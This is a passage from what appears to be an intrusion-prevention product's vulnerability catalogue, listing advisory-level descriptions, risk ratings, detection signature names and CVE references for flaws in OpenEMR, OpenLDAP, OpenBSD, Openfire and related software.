Description: Lack of sanitation of user input submitted through the /proc/group API endpoint causes an SQL injection vulnerability in Open Falcon Plus. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection
References:
CVE-2022-26245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26245
Back to top

Open-Flash-Chart-Remote-PHP-Code-Execution

About this vulnerability: An Open Flash Chart Remote PHP Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Open Flash Chart
Type: Input Validation
Description: A vulnerability in Open Flash Chart, v2 Beta 1 and v2, which allows remote attackers to upload and execute arbitrary PHP files through ofc_upload_image.php.
Situation: HTTP_CSU_Open-Flash-Chart-Remote-PHP-Code-Execution
References:
CVE-2009-4140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4140
BID-37314
http://www.securityfocus.com/bid/37314
OSVDB-59051
http://www.osvdb.org/59051
Back to top

Open-Web-Analytics-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Open Web Analytics detected
Risk: High
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Platform: Generic
Software: Open Web Analytics
Type: Input Validation
Description: A vulnerability in Open Web Analytics, versions before 1.7.4, which allows remote attackers to gain sensitive information and execute arbitrary code by sending crafted requests to the target server, due to files being generated with '<?php (instead of the intended "<?php sequence) which are not handled by the PHP interpreter, and the ability to set a PHP file as error log file in the config settings.
Situation: HTTP_CRL-Open-Web-Analytics-Remote-Code-Execution
References:
CVE-2022-24637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24637
Back to top

OpenAFS-Getstatistics64-RPC-Buffer-Overflow

About this vulnerability: A vulnerability in OpenAFS.org OpenAFS
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenAFS
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in OpenAFS, an open source implementation of the Andrew File System. The vulnerability is due to insufficient validation performed on a parameter that's used to allocate memory when processing GetStatistics64 requests. A remote unauthenticated attacker can exploit this vulnerability to send a specially crafted packet to trigger a buffer overflow. Successful attack will result in arbitrary code execution, while an unsuccessful one will lead to a denial of service condition.
Situation: Generic_UDP-OpenAFS-Getstatistics64-RPC-Buffer-Overflow
References:
CVE-2014-0159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0159
OSVDB-105720
http://www.osvdb.org/105720
Back to top

OpenBSD-ISAKMP-Multiple-Vulnerabilities

About this vulnerability: A vulnerability in OpenBSD Project OpenBSD
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: OpenBSD
Software: <os>
Type: Malfunction
Description: There are multiple vulnerabilities within the ISAKMP daemon that is included in installations of OpenBSD. A remote attacker without credentials can cause, through a steady stream of traffic, a denial of service condition on the remote server. On receiving a malformed packet, the ISAKMP daemon will allocate memory for a chunk of the incoming message (The data that is allocated is dependent on which vulnerability is taking place. See the issues in Section 4 for more details). The ISAKMP daemon, after logging a message to the server log, fails to free the memory described above. If an attacker sends a steady stream of these malformed packets, it is possible to exhaust all free memory on the OpenBSD system, causing a denial of service. All users will be unable to use the remote server until the service is restarted or the server is rebooted.
Situation: Generic_OpenBSD-ISAKMP-DOS
References:
CVE-2004-0222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0222
BID-10028
http://www.securityfocus.com/bid/10028
Back to top

OpenBSD-Kernel-ICMPv6-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in OpenBSD Project OpenBSD
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: OpenBSD
Software: <os>
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in OpenBSD operating system kernel.
Situation: IPv6_OpenBSD-Kernel-ICMPv6-Handling-Buffer-Overflow
References:
CVE-2007-1365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1365
BID-22901
http://www.securityfocus.com/bid/22901
Back to top

OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service

About this vulnerability: A vulnerability in OpenBSD Project OpenBSD
Risk: Moderate
First detected in: sgpkg-ips-1245-5242
Last changed: sgpkg-ips-1296-5242
Platform: OpenBSD
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in the way the OpenBSD operating system calculates TCP retransmit timeout values. A TCP segment with specially crafted TCP timestamp can cause an error in calculation, creating an unrecoverable system error. An attacker can leverage this vulnerability to completely disable the target system, and all services it provides. In case of a successful attack against this vulnerability, the target kernel will panic, resulting in a complete system-wide denial of service. The following message will be displayed on the system console: panic: timeout_add: to_ticks &lt; 0 Stopped at Debugger+0x4: leave The system must be manually restarted to restore functionality.
Situation: Generic_TCP-OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service
References:
CVE-2005-0740
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0740
Back to top

Opencart-Archive-Extraction-Directory-Traversal

About this vulnerability: A vulnerability in OpenCart
Risk: Moderate
First detected in: sgpkg-ips-1759-5242
Last changed: sgpkg-ips-1759-5242
Platform: Generic
Software: OpenCart
Type: Directory Traversal
Description: A code injection vulnerability has been reported in OpenCart. This vulnerability is due to improper sanitization of paths during zip extraction. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file writes.
Situation: File-Zip_Opencart-Archive-Extraction-Directory-Traversal
References:
CVE-2024-21518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21518
Back to top

OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenCATS
Risk: Moderate
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: OpenCATS
Type: Input Validation
Description: Insufficient sanitization of questionnaire values causes a cross-site scripting vulnerability in OpenCATS. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting
References:
CVE-2023-27293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27293
Back to top

OpenDocMan-Cross-Site-Scripting-CVE-2015-5625

About this vulnerability: OpenDocMan Cross-Site Scripting
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: OpenDocMan
Type: Cross-site Scripting
Description: There exists a cross-site scripting vulnerability in OpenDocMan.
Situation: HTTP_CRL-OpenDocMan-Cross-Site-Scripting-CVE-2015-5625
References:
CVE-2015-5625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5625
BID-76627
http://www.securityfocus.com/bid/76627
Back to top

Openemr-Admin-Edit_Globals-Application-Title-Stored-XSS

About this vulnerability: A vulnerability in Openemr Development Team Openemr
Risk: Moderate
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: Improper input validation for the application title in Admin global config settings causes a cross-site scripting vulnerability in Openemr. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting-2
HTTP_CRL-Openemr-Admin-Edit_Globals-Application-Title-Stored-Cross-Site-Scripting
References:
CVE-2023-2947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2947
Back to top

Openemr-Ajax_Download.php-Directory-Traversal

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: High
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Directory Traversal
Description: A vulnerability in OpenEMR, versions 5.0.1 and prior, which allows remote attackers to read and delete arbitrary files by sending a crafted request, due to the improper validation of the fileName parameter in ajax_download.php.
Situation: HTTP_CSU-Path-Traversal-Sequence-In-File-Name
References:
CVE-2019-14530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14530
Back to top

Openemr-Backup.php-Command-Injection

About this vulnerability: A vulnerability in OpenEMR
Risk: High
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: There exists a vulberability in OpenEMR, versions before 5.0.2.5, that allows remote attackers to execute arbitrary code due to insufficient sanitation for the user supplied data to backup.php.
Situation: HTTP_CS_Openemr-Backup.php-Command-Injection
References:
CVE-2020-36243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36243
Back to top

Openemr-Calendar-Search-SQL-Injection

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: High
First detected in: sgpkg-ips-1456-5242
Last changed: sgpkg-ips-1456-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: An SQL injection vulnerability exists in the OpenEMR. The vulnerability is due to improper validation of user-supplied input when processing the request to /interface/main/calendar/index.php with provider_id POST request parameter. A remote authenticated attacker could exploit this vulnerability by sending crafted HTTP request to target server. Successful exploitation could result in execution of arbitrary SQL statements, which may cause disclosure of sensitive information leading to further compromises.
Situation: HTTP_CRL-Openemr-Calendar-Search-SQL-Injection
References:
CVE-2021-41843
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41843
Back to top

Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in OpenEMR, versions 5.0.1 and earlier, which allows remote attackers to execute remote code on the target users machine due to the lack of validation of user supplied data.
Situation: HTTP_CRL-Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting
References:
CVE-2019-3966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3966
Back to top

Openemr-C_document.class.php-Patient_Id-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in OpenEMR. Successful exploitation could lead in arbitrary script execution in the target user's browser.
Situation: HTTP_CSU-Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting
References:
CVE-2019-3963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3963
Back to top

Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in OpenEMR. Opening a malicious link is required to exploit this vulnerability. Successful exploitation could lead in arbitrary script code execution on the client side.
Situation: HTTP_CSU-Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting
References:
CVE-2019-3964
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3964
Back to top

Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: High
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in OpenEMR. The vulnerability is due to insufficient sanitization of user input in Document Categories page. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation of this vulnerability could result in arbitrary script execution in the target user's browser.
Situation: HTTP_CRL-Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting
References:
CVE-2022-1178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1178
Back to top

Openemr-Download_Template-Directory-Traversal

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Directory Traversal
Description: Improper validation of the form_filename parameter in download_template.php causes a directory traversal vulnerability in OpenEMR. A successful exploit allows an attacker to gain read access to arbitrary files on the target system.
References:
CVE-2019-3967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3967
Back to top

Openemr-Download_template.php-Directory-Traversal

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1259-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Directory Traversal
Description: A directory traversal vulnerability exist in OpenEMR. The vulnerability is due to improper validation of the form_filename parameter in download_template.php. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the server. Successful exploitation could result in information disclosure condition.
Situation: HTTP_CRL-Openemr-Download_template.php-Directory-Traversal
References:
CVE-2019-3967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3967
Back to top

Openemr-Facility_admin.php-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in OpenEMR. Successful exploitation could lead in arbitrary script execution.
Situation: HTTP_CSU-Openemr-Facility_admin.php-Cross-Site-Scripting
References:
CVE-2019-8368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8368
Back to top

Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: Improper input validation for the fee_sheet_options_ajax.php endpoint causes a cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting
References:
CVE-2022-2733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2733
Back to top

Openemr-Globals.php-Authentication-Bypass

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Malfunction
Description: An authentication weakness vulnerability exists in OpenEMR, specifically the globals.php script. The vulnerability is due to variable name collision during HTTP parameter extraction. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted requests to the server. Successful exploitation will bypass authentication and allow the attacker to gain unauthorized access to the system.
Situation: HTTP_CRL-Openemr-Globals.php-Authentication-Bypass
References:
CVE-2015-4453
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4453
Back to top

Openemr-Make_Task-SQL_Injection

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: High
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: SQL Injection
Description: A vulnerability in OpenEMR Development Team OpenEMR, versions 5.0.1 Patch 6 and lower, which allows remote attackers to perform an SQL injection through the make_task function via /forms/eye_mag/taskman.php and extract the contents of the entire database.
Situation: HTTP_CSU-Openemr-Make_Task-SQL_Injection
References:
CVE-2018-17179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17179
Back to top

Openemr-New.php-Command-Injection

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: A command injection vulnerability exists in OpenEMR. The vulnerability is due to improper validation of the id parameter in new.php. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the server. Successful exploitation could result in arbitrary command execution on the target server.
Situation: HTTP_CRL-Openemr-New.php-Command-Injection
References:
CVE-2019-3968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3968
Back to top

Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR.
Risk: High
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Platform: Windows
Software: OpenEMR Development Team OpenEMR
Type: Cross-site Scripting
Description: A vulnerability in OpenEMR Development Team OpenEMR, versions prior to 6.0.0.2, which allows remote attacker to execute arbitrary code by sending crafted requests to the target server, due to insufficient sanitization of patients' first and last names in new_comprehensive_save.php.
Situation: HTTP_CRL-Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting
References:
CVE-2022-1181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1181
Back to top

Openemr-Patient_Report-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: Insufficient sanitization of the title field in patient_report.php causes a stored cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Openemr-Patient_Report-Stored-Cross-Site-Scripting
References:
CVE-2021-25921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25921
Back to top

Openemr-Phpgacl-Edit_group.php-SQL-Injection

About this vulnerability: A vulnerability in OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: There exists an SQL injection vulnerability in the OpenEMR phpGACL. Successful exploitation could lead in execution of arbitrary SQL statements.
Situation: HTTP_CRL-Openemr-Phpgacl-Edit_group.php-SQL-Injection
References:
CVE-2020-13568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13568
Back to top

Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: High
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1462-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for OpenEMR. This vulnerability is due to improper input validation for the fld_title parameter when creating rules. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting
References:
CVE-2022-1179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1179
Back to top

Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: Improper input validation for the list_id parameter in share_template.php causes a cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting
References:
CVE-2023-2948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2948
Back to top

Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenEMR Development Team OpenEMR
Risk: Moderate
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: OpenEMR Development Team OpenEMR
Type: Input Validation
Description: Insufficient sanitation for the user-supplied data in usergroup_admin.php causes a cross-site scripting vulnerability in OpenEMR. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting
Back to top

OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315

About this vulnerability: An attempt to exploit a vulnerability in Ignite Realtime OpenFire detected
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: Ignite Realtime Openfire
Type: Insecure Configuration
Description: Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0).
Situation: HTTP_CSU-OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315
References:
CVE-2023-32315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32315
Back to top

OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in OpenJPEG
Risk: Moderate
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenJPEG; MuPDF
Type: Malfunction
Description: Lack of validation of JPEG2000 file structures causes an out-of-bounds write vulnerability. A successful exploitation can allow an attacker to run arbitrary code on the target system.
Situation: File-JPEG_OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write
References:
CVE-2016-8332
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8332
Back to top

OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability

About this vulnerability: A vulnerability in OpenLDAP
Risk: High
First detected in: sgpkg-ips-1473-5242
Last changed: sgpkg-ips-1473-5242
Platform: Generic
Software: OpenLDAP
Type: Input Validation
Description: A SQL injection vulnerability has been reported in the slapd of OpenLDAP. The vulnerability is due to improper input validation in LDAP search requests. A remote attacker can exploit the vulnerability by sending a crafted query to the target OpenLDAP server. Successful exploitation could result in the arbitrary SQL command execution under the security context of the LDAP database user.
Situation: LDAP_CS-OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability
References:
CVE-2022-29155
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29155
Back to top

OpenLDAP-BER_get_next-Denial-Of-Service

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: High
First detected in: sgpkg-ips-690-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Input Validation
Description: There exists a denial of service vulnerability in OpenLDAP.
Situation: LDAP_CS-OpenLDAP-BER_get_next-Denial-Of-Service
References:
CVE-2015-6908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6908
Back to top

OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS

About this vulnerability: An OpenLDAP ldapsearch Pagesize Double Free DoS vulnerability
Risk: Moderate
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: A double free vulnerability in OpenLDAP, versions prior to 2.4.45, due to the improper handling of ldapsearch queries, which allows remote attackers to cause a denial of service condition by sending a crafted query with a pagsize of 0.
Situation: LDAP_CS-OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS
References:
CVE-2017-9287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9287
Back to top

OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service

About this vulnerability: A vulnerability in OpenLDAP
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: A vulnerability exists in OpenLDAP. The vulnerability is due to invalid memory access when handling a NULL string in a modrdn request. A remote attacker could exploit this vulnerability by sending a malicious request via a modrdn request to connect to the target server. Successful exploitation would allow cause termination of sldapd daemon resulting in a denial of service condition.
Situation: LDAP_CS-OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service
References:
CVE-2010-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0212
BID-41770
http://www.securityfocus.com/bid/41770
Back to top

OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: A code execution vulnerability exists in OpenLDAP. The vulnerability is due to a memory corruption when handling a UTF8 string via modrdn. A remote attacker could exploit this vulnerability by sending a malicious request via modrdn to connect to the target server. Successful exploitation would allow injection and execution of arbitrary code in the context of the affect service. Unsuccessful code injection attempts would cause termination of sldapd daemon resulting in a denial of service condition.
Situation: LDAP_CS-OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution
References:
CVE-2010-0211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211
BID-41770
http://www.securityfocus.com/bid/41770
Back to top

OpenLDAP-Modrdn-Request-Null-Pointer-Dereference

About this vulnerability: OpenLDAP Modrdn Request Null Pointer Dereference Vulnerability.
Risk: High
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: OpenLDAP
Type: Input Validation
Description: A vulnerability exists in OpenLDAP 2.4.22 which allows remote attackers to create a denial of service condition or execute arbitrary code by a modrdn call with a zero-length RDN destination string, due to the fact that the input is not properly validated resulting in a null pointer dereference.
Situation: LDAP_CS-OpenLDAP-Modrdn-Request-Null-Pointer-Dereference
References:
CVE-2010-0212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0212
BID-41770
http://www.securityfocus.com/bid/41770
Back to top

OpenLDAP-Nested-Filter-Stack-Overflow

About this vulnerability: A vulnerability in OpenLDAP
Risk: High
First detected in: sgpkg-ips-1255-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Buffer Overflow
Description: There exists a vulnerability in the slapd of OpenLDAP, versions before 2.4.50, which allows remote attackers to cause a denial of service condition by sending a crafted query to the target, due to improper handling of deeply nested filter in the filter.c.
Situation: LDAP_CS-Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
References:
CVE-2020-12243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12243
Back to top

OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: Moderate
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Platform: Generic
Software: OpenLDAP
Type: Infinite Loop
Description: Improper validation of incoming LDAP request contents causes a denial of service vulnerability in OpenLDAP. A successful exploit causes an infinite loop which leads to a denial of service condition.
Situation: LDAP_CS-OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service
References:
CVE-2020-36227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36227
Back to top

OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: A denial of service vulnerability exists in OpenLDAP. The vulnerability is due to NULL pointer dereference in the Deref overlay of slapd when certain LDAP request messages are processed. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the server. Successful exploitation could lead to the OpenLDAP server process terminating abnormally.
Situation: LDAP_CS-OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference
References:
CVE-2015-1545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1545
BID-72519
http://www.securityfocus.com/bid/72519
OSVDB-118031
http://www.osvdb.org/118031
Back to top

OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: Moderate
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1324-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: Improper input validation on incoming LDAP requests causes an assertion failure vulnerability in OpenLDAP Slapd. A successful exploit allows a remote attacker to cause a denial of service condition on the affected service.
Situation: LDAP_CS-OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure
References:
CVE-2020-36222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36222
Back to top

OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: Moderate
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: OpenLDAP
Type: Malfunction
Description: Improper input validation on incoming LDAP requests causes an assertion failure vulnerability in OpenLDAP. A successful exploit can allow a remote attacker to cause a denial of service condition on the target service.
Situation: LDAP_CS-OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure
References:
CVE-2020-36222
